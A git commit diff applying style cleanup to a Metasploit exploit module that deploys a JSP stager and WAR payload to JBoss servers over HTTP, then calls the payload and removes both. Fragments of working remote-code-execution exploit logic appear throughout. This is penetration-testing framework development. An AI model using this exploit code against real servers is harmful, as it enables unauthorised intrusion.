Do final cleanup

2015-01-22 18:17:14 -06:00 · 2015-01-22 18:17:14 -06:00 · b003d8f750
parent 911485f536
commit b003d8f750
1 changed files with 8 additions and 14 deletions
--- a/modules/exploits/multi/http/jboss_invoke_deploy.rb
+++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb
@ -121,7 +121,6 @@ class Metasploit4 < Msf::Exploit::Remote
      print_status("Using manually select target: \"#{mytarget.name}\"")
    end

-
    # We use a already serialized stager to deploy the final payload
    regex_stager_app_base = rand_text_alpha(14)
    regex_stager_jsp_name = rand_text_alpha(14)
@ -161,7 +160,7 @@ class Metasploit4 < Msf::Exploit::Remote
        name_parameter => app_base,
        content_parameter => b64_war
      }
-    }, 20)
+    })

    payload_uri = "/#{app_base}/#{jsp_name}.jsp"
    print_status("Calling payload: " + payload_uri)
@ -170,9 +169,7 @@ class Metasploit4 < Msf::Exploit::Remote
    # Remove the payload through  stager
    print_status("Removing payload through stager")
    delete_payload_uri = stager_uri + "?#{name_parameter}=#{app_base}"
-    res = send_request_cgi(
-      {'uri'     => delete_payload_uri,
-    })
+    res = send_request_cgi({'uri' => delete_payload_uri})

    # Remove the stager
    print_status("Removing stager")
@ -225,14 +222,11 @@ catch(Exception e) {}
 %>
 EOT

-  # The script must be exactly 810 characters long, otherwise we might have serialization issues
-  # Therefore we fill the rest wit spaces
-  spaces  = " " * (810 - stager_script.length)
-  stager_script << spaces
  end


  def send_serialized_request(file_name , replace_params = {})
+    data = ''
    case file_name
    when 'version.bin'
      data = build_get_version.encode
@ -286,7 +280,7 @@ EOT
    # JBoss might need some time for the deployment. Try 5 times at most and
    # wait 5 seconds inbetween tries
    num_attempts.times do |attempt|
-      if (verb == "POST")
+      if verb == "POST"
        res = send_request_cgi(
          {
            'uri'    => uri,
@ -303,16 +297,16 @@ EOT
      end

      msg = nil
-      if (!res)
+      if res.nil?
        msg = "Execution failed on #{uri} [No Response]"
-      elsif (res.code < 200 or res.code >= 300)
+      elsif res.code < 200 || res.code >= 300
        msg = "http request failed to #{uri} [#{res.code}]"
-      elsif (res.code == 200)
+      elsif res.code == 200
        print_status("Successfully called '#{uri}'") if datastore['VERBOSE']
        return res
      end

-      if (attempt < num_attempts - 1)
+      if attempt < num_attempts - 1
        msg << ", retrying in 5 seconds..."
        print_status(msg) if datastore['VERBOSE']
        select(nil, nil, nil, 5)